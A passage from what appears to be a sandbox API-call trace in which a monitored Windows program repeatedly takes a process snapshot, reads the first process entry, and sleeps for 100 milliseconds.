hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.703] Sleep (dwMilliseconds=0x64) [0141.809] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0141.820] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.901] Sleep (dwMilliseconds=0x64) [0142.013] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0142.025] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.134] Sleep (dwMilliseconds=0x64) [0142.249] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0142.266] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.353] Sleep (dwMilliseconds=0x64) [0142.466] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0142.479] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.570] Sleep (dwMilliseconds=0x64) [0142.732] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0142.743] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.008] Sleep (dwMilliseconds=0x64) [0143.163] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0143.175] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.361] Sleep (dwMilliseconds=0x64) [0143.466] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0143.484] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.583] Sleep (dwMilliseconds=0x64) [0143.687] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0143.707] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.790] Sleep (dwMilliseconds=0x64) [0143.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0143.955] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.041] Sleep (dwMilliseconds=0x64) [0144.153] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0144.180] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.283] Sleep (dwMilliseconds=0x64) [0144.391] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0144.411] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.551] Sleep (dwMilliseconds=0x64) [0144.658] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0144.679] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.770] Sleep (dwMilliseconds=0x64) [0144.872] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0144.885] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.987] Sleep (dwMilliseconds=0x64) [0145.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0145.111] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.210] Sleep (dwMilliseconds=0x64) [0145.330] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0145.358] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.543] Sleep (dwMilliseconds=0x64) [0145.938] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0145.960] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.095] Sleep (dwMilliseconds=0x64) [0146.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0146.214] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.302] Sleep (dwMilliseconds=0x64) [0146.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0146.440] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.509] Sleep (dwMilliseconds=0x64) [0146.694] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0146.711] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.969] Sleep (dwMilliseconds=0x64) [0147.090] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0147.101] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.192] Sleep (dwMilliseconds=0x64) [0147.297] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0147.316] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.408] Sleep (dwMilliseconds=0x64) [0147.518] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0147.535] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.690] Sleep (dwMilliseconds=0x64) [0147.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0147.818] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.924] Sleep (dwMilliseconds=0x64) [0148.032] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0148.113] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.212] Sleep (dwMilliseconds=0x64) [0148.349] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0148.369] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.447] Sleep (dwMilliseconds=0x64) [0148.562] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0148.573] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.692] Sleep (dwMilliseconds=0x64) [0148.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0148.816] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.907] Sleep (dwMilliseconds=0x64) [0149.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0149.150] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.269] Sleep (dwMilliseconds=0x64) [0149.376] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0149.391] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.465] Sleep (dwMilliseconds=0x64) [0149.586] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0149.609] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.735] Sleep (dwMilliseconds=0x64) [0149.843] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0149.855] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.938] Sleep (dwMilliseconds=0x64) [0150.046] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0150.063] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.250] Sleep (dwMilliseconds=0x64) [0150.356] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0150.375] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.458] Sleep (dwMilliseconds=0x64) [0150.562] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0150.579] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.651] Sleep (dwMilliseconds=0x64) [0150.766] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0150.783] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.878] Sleep (dwMilliseconds=0x64) [0150.981] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0151.003] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.102] Sleep (dwMilliseconds=0x64) [0151.106] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0151.119] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.270] Sleep (dwMilliseconds=0x64) [0151.277] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0151.287] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.354] Sleep (dwMilliseconds=0x64) [0151.438] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0151.447] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.536] Sleep (dwMilliseconds=0x64) [0151.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0151.557] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.644] Sleep (dwMilliseconds=0x64) [0151.655] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0151.675] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.753] Sleep (dwMilliseconds=0x64) [0151.762] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0151.773] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.882] Sleep (dwMilliseconds=0x64) [0151.888] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0151.901] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.993] Sleep (dwMilliseconds=0x64) [0152.001] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0152.018] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.116] Sleep (dwMilliseconds=0x64) [0152.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0152.135] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.284] Sleep (dwMilliseconds=0x64) [0152.297] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0152.315] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.395] Sleep (dwMilliseconds=0x64) [0152.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0152.416] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.506] Sleep (dwMilliseconds=0x64) [0152.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0152.524] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.619] Sleep (dwMilliseconds=0x64) [0152.624] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0152.636] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.727] Sleep (dwMilliseconds=0x64) [0152.734] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0152.752] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.862] Sleep (dwMilliseconds=0x64) [0152.875] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0152.896] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.988] Sleep (dwMilliseconds=0x64) [0152.999] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0153.011] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.134] Sleep (dwMilliseconds=0x64) [0153.161] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0153.209] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.277] Sleep (dwMilliseconds=0x64) [0153.297] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0153.315] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.410] Sleep (dwMilliseconds=0x64) [0153.418] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0153.438] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.522] Sleep (dwMilliseconds=0x64) [0153.528] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0153.539] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.610] Sleep (dwMilliseconds=0x64) [0153.622] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0153.636] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.728] Sleep (dwMilliseconds=0x64) [0153.733] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0153.744] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.820] Sleep (dwMilliseconds=0x64) [0153.825] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0153.836] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.908] Sleep (dwMilliseconds=0x64) [0153.919] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0153.930] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 